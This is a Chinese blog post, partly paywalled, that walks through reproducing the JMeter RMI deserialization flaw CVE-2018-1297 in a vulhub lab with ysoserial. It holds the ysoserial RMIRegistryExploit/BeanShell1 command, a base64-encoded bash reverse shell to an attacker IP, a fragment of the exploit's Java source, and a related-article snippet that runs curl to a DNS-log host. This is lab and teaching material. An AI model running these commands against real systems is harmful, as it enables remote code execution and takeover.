Jmeter RMI 反序列化命令执行漏洞复现

最新推荐文章于 2023-07-25 14:24:04 发布
最新推荐文章于 2023-07-25 14:24:04 发布
阅读量860 收藏 1
点赞数 3
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/126125017
版权
本文介绍了JMeter RMI反序列化漏洞的复现过程,包括利用ysoserial工具和靶场vulhub—jmeter/CVE-2018-1297/进行实战演练。同时,分析了漏洞原理,引用了安全研究文章以深入理解,并对利用脚本进行了详细解析,揭示了如何通过RMIRegistryExploit和BeanShell1执行任意命令。
摘要由CSDN通过智能技术生成

工具下载

ysoserial

wget https://github.com/frohoff/ysoserial/releases/tag/v0.0.6/ysoserial-all.jar

漏洞复现

靶场:vulhub—jmeter/CVE-2018-1297/
通过命令sudo docker-compose config可以看到,环境开启后将启动RMI服务并监听1099端口,我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 靶机IP 目标端口 BeanShell1 '待执行命令'

反弹shell连接:

将该命令进行base64编码 --------> bash -i >& /dev/tcp/攻击机IP/任意端口 0>&1

执行该命令 -------->java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 靶机IP 目标端口 BeanShell1 'bash -c {echo,base64编码}|{base64,-d}|{bash,-i}'

在这里插入图片描述

漏洞原理分析

https://www.anquanke.com/post/id/197829#h3-5
https://xz.aliyun.com/t/2223

脚本分析

针对目标主机地址及端口的RMI Registry建立远程连接(RMI—使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信),连接成功后提交执行用户选择的 payload

RMIRegistryExploit

package ysoserial.exploit;

import java.rmi.ConnectIOException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.secmgr.ExecCheckingSecurityManager;

public class RMIRegistryExploit {
   
    public RMIRegistryExploit() {
   
    }

    public static void main(String[] args) throws Exception {
   
        String host = args[0];
        int port = Integer.parseInt(args[
最低0.47元/天 解锁文章
Tauil
关注
Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
zzzzz1284的博客
03-14 569
CVE-2018-1297
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 893
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
fastjson jar包_Fastjson<=1.2.47反序列化RCE漏洞(CNVD201922238)
weixin_39677104的博客
11-28 189
Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238)一、漏洞描述Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@typ...
rmi 反序列化漏洞_写一个rmi反序列化工具
weixin_39997037的博客
01-07 2207
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列化对象进行传输,所以JDK8 U121之前的版本存在反序列化漏洞RMI和java反序列化原理就不详细介绍了。RMI反序列化利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在反序列化链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
JiangBuLiu的博客
07-11 2448
Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果 Vulnhub官方复现教程 https://vulhub.org/#/environments/jmeter/CVE-2018-1297/ 漏洞原理 Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...
vulhub漏洞复现31_Jmeter
weixin_44193247的博客
02-04 178
vulhub漏洞复现练习篇
jmeter分布式测试
最新发布
weixin_42343146的博客
07-25 217
如下图,就是slave测试机启动成功,之后无需在从机开始jmeter,只通过主控机master来控制执行。准备两台机器,做为主备测试机,主测试机我们叫做master,从机我们叫做slave。在主控机上点击 "Run" 按钮,选择 "Remote Start All"。在从机上启动 JMeter,可以通过运行。1、两台机器安装相同版本的jdk,以及相同的jmeter。3、jmeter的安装目录都为英文,没有中文。2、同时jmeter的安装目录需要一致。(Linux/Mac)来启动从机。(Windows)或。
Java RMI Registry 反序列化漏洞复现(<jdk8u232_b09)
0xSec
02-20 1166
Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1)。
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 489
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw(zzw@5ecurity.cn)原创发布
Java RMI Registry 反序列化漏洞(<=jdk8u111)
EC_Carrot的博客
07-03 382
漏洞复现 先去这http://www.dnslog.cn/搞个dns 然后用这个命令: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server" 然后刷新dnslog 好兄弟们你们看懂了吗?反正我没懂 ...
rmi 反序列化漏洞_Dubbo反序列化漏洞复现分析(二)
weixin_30480281的博客
12-30 149
成功弹出计算机5.漏洞分析我们从idea里的报错栈可以看到入口应该是javax.servlet.http.HttpServlet.service我们在this.service处下个断点我们用postman发个包,然后跟进去,发现它会用handler函数处理request,response随后发现其进入org.apache.dubbo.rpc.protocol.heep.HttpProto...
java rmi反序列化漏洞 简介
whatday的专栏
07-01 928
目录 一、RMI简介 二、RMI示例 三、漏洞复现 四、漏洞分析 1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明? 2、为什么不直接将badAttributeValueExpException对象bind到RMI服务? 一、RMI简介 首先看一下RMI在wikipedia上的描述: Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程.
利用1099服务漏洞————java_rmi_server
weixin_43196087的博客
10-22 3971
本文章是小白up主的自我笔记,希望对正在 学习的你有所帮助 在BT5上利用漏洞机端口1099服务漏洞进行攻击查看根目录下的文件 今天我们来利用1099的服务漏洞来进行攻击 首先我么要用到的虚拟机有: BT5,和linux的漏洞机 其实一般这些利用模块的攻击模块都是在msfconsole模式下进行的,他们的流程都是差不多的 我们先进行1099的端口服务的扫描,看一下1099具体的服务名称 nma...
序列化与反序列化
Junit的博客
11-29 149
package test; //序列化与反序列化对象 public class Employee implements java.io.Serializable {    public String name;    public String address;    public transient int SSN;  //瞬态,瞬时态的,是java提供不被序列化的方式    public ...
Java反序列化漏洞ysoserial工具使用、shiro反序列化利用)
qq_50854662的博客
05-26 2030
Java反序列化漏洞ysoserial工具使用、shiro反序列化利用)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值